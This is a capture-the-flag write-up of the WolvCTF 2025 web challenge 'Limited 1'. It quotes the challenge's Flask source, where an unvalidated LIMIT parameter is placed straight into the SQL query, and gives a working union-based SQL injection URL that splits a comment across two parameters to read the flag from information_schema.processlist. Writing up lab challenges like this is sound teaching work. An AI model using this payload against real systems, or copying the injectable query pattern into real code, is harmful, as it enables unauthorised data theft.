🌐 Limited 1
A detailed write-up of the Web challenge 'Limited 1' from WolvCTF - 2025
📊 Challenge Overview
Category Details Additional Info 🏆 Event WolvCTF - 2025 Event Link 🔰 Category Web 🌐 💎 Points 489 Out of 500 total ⭐ Difficulty 🟢 Easy Personal Rating: 3/10 👤 Author SamXML Profile 🎮 Solves (At the time of flag submission) 18 solve rate 📅 Date 22-03-2025 WolvCTF - 2025 🦾 Solved By mH4ck3r0n3 Team: QnQSec
📝 Challenge Information
Can you attack the menu system to read the flag that is in a comment inside the query itself? (source provided as dist.tar.gz) Note: This is the first in a series of 3 challenges https://limited-app-974780027560.us-east5.run.app/
🎯 Challenge Files & Infrastructure
Provided Files
Files:
🔍 Initial Analysis
First Steps
Initially, the website appears as follows:
from here, we can already infer that this is an
SQL Injection
. So I immediately moved on to analyzing the attached files. The first file I checked wasinitialize.sql
:
1 2 3 4 5 6
-- The actual name of this table in the host challenge starts with Flag_ but is unguessable. CREATE TABLE Flag_REDACTED ( value VARCHAR(255) NOT NULL ); INSERT INTO Flag_REDACTED (value) VALUES ('wctf{redacted-flag}');
apparently, a flag is located in the
Flag_*
table (meaning we need to enumerate the tables), as this is a series of3
challenges. Then, analyzingapp.py
, I found the vulnerable code snippet and also where the flag for this challenge is located:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
@app.route('/query') def query(): try: price = float(request.args.get('price') or '0.00') except: price = 0.0 price_op = str(request.args.get('price_op') or '>') if not re.match(r' ?(=|<|<=|<>|>=|>) ?', price_op): return 'price_op must be one of =, <, <=, <>, >=, or > (with an optional space on either side)', 400 # allow for at most one space on either side if len(price_op) > 4: return 'price_op too long', 400 # I'm pretty sure the LIMIT clause cannot be used for an injection # with MySQL 9.x # # This attack works in v5.5 but not later versions # https://lightless.me/archives/111.html limit = str(request.args.get('limit') or '1') query = f"""SELECT /*{FLAG1}*/category, name, price, description FROM Menu WHERE price {price_op} {price} ORDER BY 1 LIMIT {limit}""" print('query:', query)
as we can see, the flag is inserted inside a comment within the query itself! Obviously, since all the other parameters are validated, our injection will go into the
limit
parameter. Let’s move on to the exploitation phase.
🔬 Vulnerability Analysis
Potential Vulnerabilities
- SQL Injection
🎯 Solution Path
Exploitation Steps
Initial setup
Since the query output is limited to
4
, aUnion Based SQL Injection
with4
columns will be required.
Exploitation
After several attempts, I constructed the following payload:
1
https://limited-app-974780027560.us-east5.run.app/query?price=10.00&price_op=< /*&limit=*/ 0 UNION SELECT 1, (SELECT info FROM information_schema.processlist WHERE id = CONNECTION_ID()), 3, 4 --
The reason I can extract the comment is that the SQL injection manipulates the comment delimiters. Normally, the flag is placed inside a comment (using
/*{FLAG1}*/
) and would neither be executed nor displayed. But with the parameters:
"price_op": "< /*"
"limit": "*/ 0 UNION SELECT 1, (SELECT info FROM information_schema.processlist WHERE id = CONNECTION_ID()), 3, 4 -- "
the comment is closed prematurely. In other words, the
price_op
parameter opens a new comment (with/*
), and then thelimit
parameter closes it (with*/
), separating the part containing the flag and making it part of the query output (via the UNION). This way, the comment that contained the flag becomes part of the returned string, allowing the attacker to extract it using regex.
Flag capture
🛠️ Exploitation Process
Approach
The automatic exploit sends a GET request with the previously mentioned payload and extracts the flag from the response using a regex.
🚩 Flag Capture
Flagwctf{bu7_my5ql_h45_n0_curr3n7_qu3ry_func710n_l1k3_p0576r35_d035_25785458}
Proof of Execution
🔧 Tools Used
Tool Purpose Python Exploit
💡 Key Learnings
Skills Improved
- Binary Exploitation
- Reverse Engineering
- Web Exploitation
- Cryptography
- Forensics
- OSINT
- Miscellaneous
📚 References & Resources
Similar Challenges
Learning Resources
📊 Final Statistics
Metric | Value | Notes |
---|---|---|
Time to Solve | 00:25 | From start to flag |
Global Ranking (At the time of flag submission) | 20/328 | Challenge ranking |
Points Earned | 489 | Team contribution |
Created: 22-03-2025 • Last Modified: 22-03-2025 Author: mH4ck3r0n3 • Team: QnQSec